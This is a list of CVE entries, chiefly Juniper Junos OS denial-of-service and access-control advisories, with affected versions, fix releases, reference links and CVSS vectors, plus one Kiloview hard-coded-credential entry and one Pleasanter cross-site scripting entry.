CVE    2024    21613    Candidate    A Missing Release of Memory after Effective Lifetime vulnerability in Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause an rpd crash, leading to Denial of Service (DoS). On all Junos OS and Junos OS Evolved platforms, when traffic engineering is enabled for OSPF or ISIS, and a link flaps, a patroot memory leak is observed. This memory leak, over time, will lead to an rpd crash and restart. The memory usage can be monitored using the below command. user@host> show task memory detail | match patroot This issue affects: Juniper Networks Junos OS * All versions earlier than 21.2R3-S3; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-EVO; * 22.1 versions earlier than 22.1R3-EVO; * 22.2 versions earlier than 22.2R3-EVO.    MISC:https://supportportal.juniper.net/JSA75754   |   URL:https://supportportal.juniper.net/JSA75754   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21612    Candidate    An Improper Handling of Syntactically Invalid Structure vulnerability in Object Flooding Protocol (OFP) service of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On all Junos OS Evolved platforms, when specific TCP packets are received on an open OFP port, the OFP crashes leading to a restart of Routing Engine (RE). Continuous receipt of these specific TCP packets will lead to a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS Evolved * All versions earlier than 21.2R3-S7-EVO; * 21.3 versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-EVO; * 22.4 versions earlier than 22.4R2-EVO, 22.4R3-EVO.    MISC:https://supportportal.juniper.net/JSA75753   |   URL:https://supportportal.juniper.net/JSA75753   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21611    Candidate    A Missing Release of Memory after Effective Lifetime vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). In a Juniper Flow Monitoring (jflow) scenario route churn that causes BGP next hops to be updated will cause a slow memory leak and eventually a crash and restart of rpd. Thread level memory utilization for the areas where the leak occurs can be checked using the below command: user@host> show task memory detail | match so_in so_in6 28 32 344450 11022400 344760 11032320 so_in 8 16 1841629 29466064 1841734 29467744 This issue affects: Junos OS * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3. Junos OS Evolved * 21.4-EVO versions earlier than 21.4R3-EVO; * 22.1-EVO versions earlier than 22.1R3-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO. This issue does not affect: Juniper Networks Junos OS versions earlier than 21.4R1. Juniper Networks Junos OS Evolved versions earlier than 21.4R1.    MISC:https://supportportal.juniper.net/JSA75752   |   URL:https://supportportal.juniper.net/JSA75752   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    2161    Candidate    Use of Hard-coded Credentials in Kiloview NDI allows unauthenticated users to bypass authentication. This issue affects Kiloview NDI N3, N3-s, N4, N20, N30, N40 and was fixed in Firmware version 2.02.0227.    MISC:https://www.kiloview.com/en/support/download/1779/   |   URL:https://www.kiloview.com/en/support/download/1779/   |   MISC:https://www.kiloview.com/en/support/download/n20-firmware-download/   |   URL:https://www.kiloview.com/en/support/download/n20-firmware-download/   |   MISC:https://www.kiloview.com/en/support/download/n3-for-ndi/   |   URL:https://www.kiloview.com/en/support/download/n3-for-ndi/   |   MISC:https://www.kiloview.com/en/support/download/n3-s-firmware-download/   |   URL:https://www.kiloview.com/en/support/download/n3-s-firmware-download/   |   MISC:https://www.kiloview.com/en/support/download/n30-for-ndi/   |   URL:https://www.kiloview.com/en/support/download/n30-for-ndi/   |   MISC:https://www.kiloview.com/en/support/download/n40/   |   URL:https://www.kiloview.com/en/support/download/n40/    Assigned (20240304)
CVE    2024    21607    Candidate    An Unsupported Feature in the UI vulnerability in Juniper Networks Junos OS on MX Series and EX9200 Series allows an unauthenticated, network-based attacker to cause partial impact to the integrity of the device. If the "tcp-reset" option is added to the "reject" action in an IPv6 filter which matches on "payload-protocol", packets are permitted instead of rejected. This happens because the payload-protocol match criteria is not supported in the kernel filter causing it to accept all packets without taking any other action. As a fix the payload-protocol match will be treated the same as a "next-header" match to avoid this filter bypass. This issue doesn't affect IPv4 firewall filters. This issue affects Juniper Networks Junos OS on MX Series and EX9200 Series: * All versions earlier than 20.4R3-S7; * 21.1 versions earlier than 21.1R3-S5; * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S4; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S2; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R1-S2, 22.4R2-S2, 22.4R3.    MISC:https://supportportal.juniper.net/JSA75748   |   URL:https://supportportal.juniper.net/JSA75748   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21606    Candidate    A Double Free vulnerability in the flow processing daemon (flowd) of Juniper Networks Junos OS on SRX Series allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). In a remote access VPN scenario, if a "tcp-encap-profile" is configured and a sequence of specific packets is received, a flowd crash and restart will be observed. This issue affects Juniper Networks Junos OS on SRX Series: * All versions earlier than 20.4R3-S8; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3.    MISC:https://supportportal.juniper.net/JSA75747   |   URL:https://supportportal.juniper.net/JSA75747   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H    Assigned (20231227)
CVE    2024    21604    Candidate    An Allocation of Resources Without Limits or Throttling vulnerability in the kernel of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a high rate of specific valid packets are processed by the routing engine (RE) this will lead to a loss of connectivity of the RE with other components of the chassis and thereby a complete and persistent system outage. Please note that a carefully designed lo0 firewall filter will block or limit these packets which should prevent this issue from occurring. The following log messages can be seen when this issue occurs: <host> kernel: nf_conntrack: nf_conntrack: table full, dropping packet This issue affects Juniper Networks Junos OS Evolved: * All versions earlier than 20.4R3-S7-EVO; * 21.2R1-EVO and later versions; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S2-EVO; * 22.2-EVO versions earlier than 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO; * 22.4-EVO versions earlier than 22.4R2-EVO.    MISC:https://supportportal.juniper.net/JSA75745   |   URL:https://supportportal.juniper.net/JSA75745   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21603    Candidate    An Improper Check for Unusual or Exceptional Conditions vulnerability in the kernel of Juniper Networks Junos OS on MX Series allows a network-based attacker with low privileges to cause a denial of service. If a scaled configuration for Source class usage (SCU) / destination class usage (DCU) (more than 10 route classes) is present and the SCU/DCU statistics are gathered by executing specific SNMP requests or CLI commands, a 'vmcore' for the RE kernel will be seen which leads to a device restart. Continued exploitation of this issue will lead to a sustained DoS. This issue only affects MX Series devices with MPC10, MPC11 or LC9600, and MX304. No other MX Series devices are affected. This issue affects Juniper Networks Junos OS: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R2; * 22.3 versions earlier than 22.3R2.    MISC:https://supportportal.juniper.net/JSA75744   |   URL:https://supportportal.juniper.net/JSA75744   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21602    Candidate    A NULL Pointer Dereference vulnerability in Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). If a specific IPv4 UDP packet is received and sent to the Routing Engine (RE) packetio crashes and restarts which causes a momentary traffic interruption. Continued receipt of such packets will lead to a sustained DoS. This issue does not happen with IPv6 packets. This issue affects Juniper Networks Junos OS Evolved on ACX7024, ACX7100-32C and ACX7100-48L: * 21.4-EVO versions earlier than 21.4R3-S6-EVO; * 22.1-EVO versions earlier than 22.1R3-S5-EVO; * 22.2-EVO versions earlier than 22.2R2-S1-EVO, 22.2R3-EVO; * 22.3-EVO versions earlier than 22.3R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions earlier than 21.4R1-EVO.    MISC:https://supportportal.juniper.net/JSA75743   |   URL:https://supportportal.juniper.net/JSA75743   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21601    Candidate    A Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in the Flow-processing Daemon (flowd) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial-of-Service (DoS). On SRX Series devices when two different threads try to simultaneously process a queue which is used for TCP events flowd will crash. One of these threads cannot be triggered externally, so the exploitation of this race condition is outside the attacker's direct control. Continued exploitation of this issue will lead to a sustained DoS. This issue affects Juniper Networks Junos OS: * 21.2 versions earlier than 21.2R3-S5; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S4; * 22.1 versions earlier than 22.1R3-S3; * 22.2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2-S1, 22.4R3. This issue does not affect Juniper Networks Junos OS versions earlier than 21.2R1.    MISC:https://supportportal.juniper.net/JSA75742   |   URL:https://supportportal.juniper.net/JSA75742   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21600    Candidate    An Improper Neutralization of Equivalent Special Elements vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on PTX Series allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). When MPLS packets are meant to be sent to a flexible tunnel interface (FTI) and if the FTI tunnel is down, these will hit the reject NH, due to which the packets get sent to the CPU and cause a host path wedge condition. This will cause the FPC to hang and requires a manual restart to recover. Please note that this issue specifically affects PTX1000, PTX3000, PTX5000 with FPC3, PTX10002-60C, and PTX10008/16 with LC110x. Other PTX Series devices and Line Cards (LC) are not affected. The following log message can be seen when the issue occurs: Cmerror Op Set: Host Loopback: HOST LOOPBACK WEDGE DETECTED IN PATH ID <id> (URI: /fpc/<fpc>/pfe/<pfe>/cm/<cm>/Host_Loopback/<cm>/HOST_LOOPBACK_MAKE_CMERROR_ID[<id>]) This issue affects Juniper Networks Junos OS: * All versions earlier than 20.4R3-S8; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3-S6; * 21.3 versions earlier than 21.3R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R2-S2, 22.1R3; * 22.2 versions earlier than 22.2R2-S1, 22.2R3.    MISC:https://supportportal.juniper.net/JSA75741   |   URL:https://supportportal.juniper.net/JSA75741   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21599    Candidate    A Missing Release of Memory after Effective Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an adjacent, unauthenticated attacker to cause a Denial of Service (DoS). If an MX Series device receives PTP packets on an MPC3E that doesn't support PTP this causes a memory leak which will result in unpredictable behavior and ultimately in an MPC crash and restart. To monitor for this issue, please use the following FPC vty level commands: show heap shows an increase in "LAN buffer" utilization and show clksync ptp nbr-upd-info shows non-zero "Pending PFEs" counter. This issue affects Juniper Networks Junos OS on MX Series with MPC3E: * All versions earlier than 20.4R3-S3; * 21.1 versions earlier than 21.1R3-S4; * 21.2 versions earlier than 21.2R3; * 21.3 versions earlier than 21.3R2-S1, 21.3R3; * 21.4 versions earlier than 21.4R2; * 22.1 versions earlier than 22.1R2.    MISC:https://supportportal.juniper.net/JSA75740   |   URL:https://supportportal.juniper.net/JSA75740   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21597    Candidate    An Exposure of Resource to Wrong Sphere vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated, network-based attacker to bypass the intended access restrictions. In an Abstracted Fabric (AF) scenario if routing-instances (RI) are configured, specific valid traffic destined to the device can bypass the configured lo0 firewall filters as it's received in the wrong RI context. This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S3; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2.    MISC:https://supportportal.juniper.net/JSA75738   |   URL:https://supportportal.juniper.net/JSA75738   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21596    Candidate    A Heap-based Buffer Overflow vulnerability in the Routing Protocol Daemon (RPD) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, network based attacker to cause a Denial of Service (DoS). If an attacker sends a specific BGP UPDATE message to the device, this will cause a memory overwrite and therefore an RPD crash and restart in the backup Routing Engine (RE). Continued receipt of these packets will cause a sustained Denial of Service (DoS) condition in the backup RE. The primary RE is not impacted by this issue and there is no impact on traffic. This issue only affects devices with NSR enabled. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. This issue requires an attacker to have an established BGP session to a system affected by the issue. This issue affects both eBGP and iBGP implementations. This issue affects: Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S2; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.1 versions earlier than 23.1R2; * 23.2 versions earlier than 23.2R1-S2, 23.2R2. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4-EVO versions earlier than 21.4R3-S5-EVO; * 22.1-EVO versions earlier than 22.1R3-S4-EVO; * 22.2-EVO versions earlier than 22.2R3-S2-EVO; * 22.3-EVO versions later than 22.3R1-EVO; * 22.4-EVO versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.1-EVO versions earlier than 23.1R2-EVO; * 23.2-EVO versions earlier than 23.2R1-S2-EVO, 23.2R2-EVO.    MISC:https://supportportal.juniper.net/JSA75735   |   URL:https://supportportal.juniper.net/JSA75735   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21595    Candidate    An Improper Validation of Syntactic Correctness of Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS). If an attacker sends a high rate of specific ICMP traffic to a device with VXLAN configured, this causes a deadlock of the PFE and results in the device becoming unresponsive. A manual restart will be required to recover the device. This issue only affects EX4100, EX4400, EX4600, QFX5000 Series devices. This issue affects: Juniper Networks Junos OS * 21.4R3 versions earlier than 21.4R3-S4; * 22.1R3 versions earlier than 22.1R3-S3; * 22.2R2 versions earlier than 22.2R3-S1; * 22.3 versions earlier than 22.3R2-S2, 22.3R3; * 22.4 versions earlier than 22.4R2; * 23.1 versions earlier than 23.1R2.    MISC:https://advisory.juniper.net/JSA75734   |   URL:https://advisory.juniper.net/JSA75734   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21594    Candidate    A Heap-based Buffer Overflow vulnerability in the Network Services Daemon (NSD) of Juniper Networks Junos OS allows an authenticated, low privileged, local attacker to cause a Denial of Service (DoS). On an SRX 5000 Series device, when executing a specific command repeatedly, memory is corrupted, which leads to a Flow Processing Daemon (flowd) crash. The NSD process has to be restarted to restore services. If this issue occurs, it can be checked with the following command: user@host> request security policies check The following log message can also be observed: Error: policies are out of sync for PFE node<number>.fpc<number>.pic<number>. This issue affects: Juniper Networks Junos OS on SRX 5000 Series * All versions earlier than 20.4R3-S6; * 21.1 versions earlier than 21.1R3-S5; * 21.2 versions earlier than 21.2R3-S4; * 21.3 versions earlier than 21.3R3-S3; * 21.4 versions earlier than 21.4R3-S3; * 22.1 versions earlier than 22.1R3-S1; * 22.2 versions earlier than 22.2R3; * 22.3 versions earlier than 22.3R2.    MISC:https://supportportal.juniper.net/JSA75733   |   URL:https://supportportal.juniper.net/JSA75733   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21591    Candidate    An Out-of-bounds Write vulnerability in J-Web of Juniper Networks Junos OS on SRX Series and EX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS), or Remote Code Execution (RCE) and obtain root privileges on the device. This issue is caused by use of an insecure function allowing an attacker to overwrite arbitrary memory. This issue affects Juniper Networks Junos OS SRX Series and EX Series: * Junos OS versions earlier than 20.4R3-S9; * Junos OS 21.2 versions earlier than 21.2R3-S7; * Junos OS 21.3 versions earlier than 21.3R3-S5; * Junos OS 21.4 versions earlier than 21.4R3-S5; * Junos OS 22.1 versions earlier than 22.1R3-S4; * Junos OS 22.2 versions earlier than 22.2R3-S3; * Junos OS 22.3 versions earlier than 22.3R3-S2; * Junos OS 22.4 versions earlier than 22.4R2-S2, 22.4R3.    MISC:https://curesec.com/blog/article/CVE-2024-21591_Juniper_Remote_Code_Exec.html   |   URL:https://curesec.com/blog/article/CVE-2024-21591_Juniper_Remote_Code_Exec.html   |   MISC:https://supportportal.juniper.net/JSA75729   |   URL:https://supportportal.juniper.net/JSA75729   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21589    Candidate    An Improper Access Control vulnerability in the Juniper Networks Paragon Active Assurance Control Center allows an unauthenticated network-based attacker to access reports without authenticating, potentially containing sensitive configuration information. A feature was introduced in version 3.1.0 of the Paragon Active Assurance Control Center which allows users to selectively share account data. By exploiting this vulnerability, it is possible to access reports without being logged in, resulting in the opportunity for malicious exfiltration of user data. Note that the Paragon Active Assurance Control Center SaaS offering is not affected by this issue. This issue affects Juniper Networks Paragon Active Assurance versions 3.1.0, 3.2.0, 3.2.2, 3.3.0, 3.3.1, 3.4.0. This issue does not affect Juniper Networks Paragon Active Assurance versions earlier than 3.1.0.    MISC:https://supportportal.juniper.net/JSA75727   |   URL:https://supportportal.juniper.net/JSA75727   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N    Assigned (20231227)
CVE    2024    21587    Candidate    An Improper Handling of Exceptional Conditions vulnerability in the broadband edge subscriber management daemon (bbe-smgd) of Juniper Networks Junos OS on MX Series allows an attacker directly connected to the vulnerable system who repeatedly flaps DHCP subscriber sessions to cause a slow memory leak, ultimately leading to a Denial of Service (DoS). Memory can only be recovered by manually restarting bbe-smgd. This issue only occurs if BFD liveness detection for DHCP subscribers is enabled. Systems without BFD liveness detection enabled are not vulnerable to this issue. Indication of the issue can be observed by periodically executing the 'show system processes extensive' command, which will indicate an increase in memory allocation for bbe-smgd. A small amount of memory is leaked every time a DHCP subscriber logs in, which will become visible over time, ultimately leading to memory starvation. user@junos> show system processes extensive | match bbe-smgd 13071 root 24 0 415M 201M select 0 0:41 7.28% bbe-smgd{bbe-smgd} 13071 root 20 0 415M 201M select 1 0:04 0.00% bbe-smgd{bbe-smgd} ... user@junos> show system processes extensive | match bbe-smgd 13071 root 20 0 420M 208M select 0 4:33 0.10% bbe-smgd{bbe-smgd} 13071 root 20 0 420M 208M select 0 0:12 0.00% bbe-smgd{bbe-smgd} ... This issue affects Juniper Networks Junos OS on MX Series: * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S2; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2.    MISC:https://supportportal.juniper.net/JSA75725   |   URL:https://supportportal.juniper.net/JSA75725   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21585    Candidate    An Improper Handling of Exceptional Conditions vulnerability in BGP session processing of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker, using specific timing outside the attacker's control, to flap BGP sessions and cause the routing protocol daemon (rpd) process to crash and restart, leading to a Denial of Service (DoS) condition. Continued BGP session flapping will create a sustained Denial of Service (DoS) condition. This issue only affects routers configured with non-stop routing (NSR) enabled. Graceful Restart (GR) helper mode, enabled by default, is also required for this issue to be exploitable. Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability. When the BGP session flaps on the NSR-enabled router, the device enters GR-helper/LLGR-helper mode due to the peer having negotiated GR/LLGR-restarter capability and the backup BGP requests for replication of the GR/LLGR-helper session, master BGP schedules, and initiates replication of GR/LLGR stale routes to the backup BGP. In this state, if the BGP session with the BGP peer comes up again, unsolicited replication is initiated for the peer without cleaning up the ongoing GR/LLGR-helper mode replication. This parallel two instances of replication for the same peer leads to the assert if the BGP session flaps again. This issue affects: Juniper Networks Junos OS * All versions earlier than 20.4R3-S9; * 21.2 versions earlier than 21.2R3-S7; * 21.3 versions earlier than 21.3R3-S5; * 21.4 versions earlier than 21.4R3-S5; * 22.1 versions earlier than 22.1R3-S4; * 22.2 versions earlier than 22.2R3-S3; * 22.3 versions earlier than 22.3R3-S1; * 22.4 versions earlier than 22.4R2-S2, 22.4R3; * 23.2 versions earlier than 23.2R1-S1, 23.2R2. Juniper Networks Junos OS Evolved * All versions earlier than 21.3R3-S5-EVO; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO; * 22.3 versions earlier than 22.3R3-S1-EVO; * 22.4 versions earlier than 22.4R2-S2-EVO, 22.4R3-EVO; * 23.2 versions earlier than 23.2R1-S1-EVO, 23.2R2-EVO.    MISC:https://supportportal.juniper.net/JSA75723   |   URL:https://supportportal.juniper.net/JSA75723   |   MISC:https://supportportal.juniper.net/s/article/MX-GR-and-LLGR-capability-and-compatibility-changes-after-15-1-release   |   URL:https://supportportal.juniper.net/s/article/MX-GR-and-LLGR-capability-and-compatibility-changes-after-15-1-release   |   MISC:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L   |   URL:https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L    Assigned (20231227)
CVE    2024    21584    Candidate    Pleasanter 1.3.49.0 and earlier contains a cross-site scripting vulnerability. If an attacker tricks the user to access the product with a specially crafted URL and perform a specific operation, an arbitrary script may be executed on the web browser of the user.    MISC:https://jvn.jp/en/jp/JVN51135247/   |   URL:https://jvn.jp/en/jp/JVN51135247/   |   MISC:https://pleasanter.org/archives/vulnerability-update-202401   |   URL:https://pleasanter.org/archives/vulnerability-update-202401    Assigned (20231225)
